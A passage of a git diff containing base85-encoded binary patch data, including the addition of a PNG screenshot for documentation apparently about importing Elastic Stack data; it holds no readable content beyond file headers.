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 H$LoIqV%gpQ literal 0 HcmV?d00001 
diff --git a/doc/ElasticStackImport/13-RecommendedColumns.png b/doc/ElasticStackImport/13-RecommendedColumns.png new file mode 100644 index 0000000000000000000000000000000000000000..20ec3a29ff04ab9a73ebc962ab468c5ea9c8fc0d GIT binary patch literal 98959 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⧀91P~g( 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 
